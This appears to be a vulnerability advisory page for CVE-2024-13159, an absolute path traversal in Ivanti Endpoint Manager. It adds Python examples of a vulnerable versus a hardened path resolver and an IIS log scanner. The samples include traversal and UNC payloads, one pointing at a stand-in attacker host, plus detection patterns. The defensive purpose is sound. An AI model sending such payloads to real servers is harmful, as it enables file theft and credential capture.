CVE-2024-13159
Published: 14 January 2025
Summary
CVE-2024-13159 is a critical-severity absolute path traversal vulnerability (CWE-36) in Ivanti Endpoint Manager (EPM) with a CVSS 3.1 base score of 9.8 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Data from Local System (T1005). The CVE ranks in the top 0.1% of all CVEs by EPSS exploit likelihood, CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2024-13159 is an absolute path traversal vulnerability, tracked under CWE-36, in Ivanti Endpoint Manager (EPM) 2024 and EPM 2022 SU6 prior to their January 2025 Security Updates. A remote, unauthenticated attacker can read arbitrary files on the affected server, disclosing sensitive information. The CVSS 3.1 base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H): network attack vector, low attack complexity, no privileges or user interaction required, and high impact on confidentiality, integrity and availability.
The attacker sends crafted requests in which a client-controlled file location is an absolute path (or a UNC path) rather than a name confined to the directory the service is meant to serve; the server follows that path and returns the file contents. Recovered data may include credentials or configuration details, enabling further compromise of the EPM deployment and potentially broader network access. Because the path may point at a remote share, the same flaw can also force the server to authenticate outbound to an attacker-controlled host.
Ivanti's January 2025 Security Advisory directs customers to apply the January 2025 Security Updates for EPM 2024 and EPM 2022 SU6. CISA added the vulnerability to its Known Exploited Vulnerabilities catalog on 10 March 2025, confirming in-the-wild exploitation, and its EPSS score remains elevated at about 0.94.
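The two behaviours described above, as an added example that is not code from this page or from Ivanti: a file-serving routine that joins a client-supplied path onto its base directory (the absolute path traversal pattern of CWE-36), beside a hardened version that rejects absolute, UNC, drive-relative, rooted and parent-directory paths before touching the filesystem. The base directory, the function names and all sample inputs are assumptions; pathlib's PureWindowsPath is used so that Windows path semantics can be exercised on any platform.

```python
"""Added example (not Ivanti's code): why a naive join of an attacker-supplied
path is an absolute path traversal (CWE-36), and how to validate it instead.
BASE_DIR, the function names and all sample inputs are assumptions."""
from pathlib import PureWindowsPath
from typing import Optional

# Assumed: the service is only meant to serve files beneath this directory.
BASE_DIR = PureWindowsPath(r"C:\ProgramData\ExampleVendor\Files")


def vulnerable_resolve(filename: str) -> PureWindowsPath:
    """'Before' behaviour. Joining onto BASE_DIR looks safe, but a path with its
    own drive or UNC prefix replaces the base entirely, and a rooted path
    (\\Windows\\...) replaces everything after the drive letter. The server then
    opens whatever the client named, including \\\\attacker\\share\\..., which also
    makes it authenticate outbound to the attacker (forced authentication)."""
    return BASE_DIR.joinpath(filename)


def rejection_reason(filename: str) -> Optional[str]:
    """Classify a client-supplied path; None means it is a plain relative path."""
    p = PureWindowsPath(filename)
    if p.drive.startswith("\\\\"):          # \\host\share\... or //host/share/...
        return "unc path"
    if p.drive or p.root:                   # C:\x, C:x (drive-relative), \x (rooted)
        return "absolute or rooted path"
    if ".." in p.parts:                     # pathlib collapses '.', never '..'
        return "parent-directory segment"
    if not p.parts:
        return "empty path"
    return None


def safe_resolve(filename: str) -> PureWindowsPath:
    """Hardened form: refuse anything that is not a relative path under BASE_DIR."""
    reason = rejection_reason(filename)
    if reason:
        raise ValueError(f"rejected {filename!r}: {reason}")
    candidate = BASE_DIR.joinpath(filename)
    # Belt and braces: the result must still sit strictly inside BASE_DIR.
    if BASE_DIR not in candidate.parents:
        raise ValueError(f"rejected {filename!r}: escapes base directory")
    return candidate


if __name__ == "__main__":
    for sample in (r"reports\2025\q1.txt", r"C:\Windows\win.ini",
                   r"\\attacker\share\loot.txt", r"..\..\secret.txt"):
        print(f"{sample!r:32} vulnerable -> {vulnerable_resolve(sample)}")
        try:
            print(f"{'':32} safe       -> {safe_resolve(sample)}")
        except ValueError as exc:
            print(f"{'':32} safe       -> {exc}")
```

The classification step matters more than the final containment check: by the time a UNC path has been joined and opened, the outbound SMB authentication has already happened, so the input must be refused before any filesystem call.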
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-51385
Vulnerability details
Absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update allows a remote unauthenticated attacker to leak sensitive information.
- CWE(s): CWE-36 (Absolute Path Traversal)
- KEV Date Added: 10 March 2025
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
- T1190 (Exploit Public-Facing Application): the flaw is reachable without authentication in a network-facing EPM application.
- T1005 (Data from Local System) and T1083 (File and Directory Discovery): absolute path traversal lets the attacker read, and probe for, arbitrary files on the server.
- T1187 (Forced Authentication): a UNC path supplied as the file location coerces the server into authenticating outbound to an attacker-controlled host.
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): requires timely identification, reporting and correction of the flaw by applying Ivanti's January 2025 Security Updates for EPM 2024 and EPM 2022 SU6.
- SI-10 (Information Input Validation): directly prevents absolute path traversal by validating externally supplied file paths and restricting access to the intended directory, rejecting absolute, UNC, rooted and parent-directory forms before any file is opened.
- SC-7 (Boundary Protection): web application firewalls or inspection proxies in front of EPM can block remote, unauthenticated path traversal payloads; this is a compensating control for the window before patching, not a substitute for it.
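A detection-side counterpart to the boundary-protection and in-the-wild-exploitation points above, added here and not part of the page or of any Ivanti tooling: a scan over IIS W3C-format log lines that flags query parameters carrying UNC, drive-absolute, drive-relative, rooted or parent-directory paths after URL decoding, including the double-encoded form. The log lines are constructed, the endpoint /example/FileService.asmx and the parameter name are hypothetical, and column positions are read from the log's own #Fields directive rather than assumed.

```python
"""Added example (not Ivanti's code or the page's): flag IIS W3C log entries whose
query parameters carry UNC, drive-absolute, rooted or parent-directory paths.
The log lines are constructed; /example/FileService.asmx and 'filename' are hypothetical."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote

# Order matters: the UNC pattern must win over the generic "rooted" pattern.
PATH_PATTERNS = [
    ("unc_path",       re.compile(r"^(\\\\|//)[^\\/]+[\\/]")),   # \\host\share\... or //host/share/...
    ("drive_absolute", re.compile(r"^[A-Za-z]:[\\/]")),          # C:\... or C:/...
    ("drive_relative", re.compile(r"^[A-Za-z]:")),               # C:file (current dir on C:)
    ("rooted",         re.compile(r"^[\\/]")),                   # \Windows\...
    ("dot_dot",        re.compile(r"(^|[\\/])\.\.([\\/]|$)")),   # ..\ segment anywhere
]


def classify_value(value: str) -> Optional[str]:
    """Return the first matching pattern name, after undoing one extra layer of
    percent-encoding (parse_qsl already removed the first; %255c is a common dodge)."""
    decoded = unquote(value)
    for name, pattern in PATH_PATTERNS:
        if pattern.search(decoded):
            return name
    return None


def scan_iis_log(lines: List[str]) -> List[Tuple[str, str, str, str, str]]:
    """Return (client_ip, uri_stem, parameter, decoded_value, kind) for suspicious requests.
    Column positions are taken from the log's own #Fields directive."""
    fields: List[str] = []
    findings = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        cols = line.split()
        if len(cols) != len(fields):
            continue                                  # malformed line: skip
        row = dict(zip(fields, cols))
        query = row.get("cs-uri-query", "-")
        if query == "-":                              # IIS writes '-' for "no query string"
            continue
        for key, val in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(val)
            if kind:
                findings.append((row["c-ip"], row["cs-uri-stem"], key, unquote(val), kind))
    return findings


# Constructed sample log; only the last three requests are exploit-shaped.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2025-01-15 09:12:01 10.10.1.20 GET /example/FileService.asmx filename=reports%2f2025%2fq1.txt 200
2025-01-15 09:12:07 10.10.1.20 GET /example/FileService.asmx - 200
2025-01-15 09:13:44 198.51.100.7 GET /example/FileService.asmx filename=C:%5cWindows%5cwin.ini 200
2025-01-15 09:13:45 198.51.100.7 GET /example/FileService.asmx filename=%5c%5c198.51.100.7%5cshare%5cx.txt 500
2025-01-15 09:13:46 198.51.100.7 GET /example/FileService.asmx filename=..%255c..%255csecrets.cfg 200
""".splitlines()


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

A UNC hit deserves the highest priority: even a failed request (the 500 above) means the server may already have attempted an outbound SMB authentication to the host named in the path, so the same address should be checked against egress firewall and authentication logs.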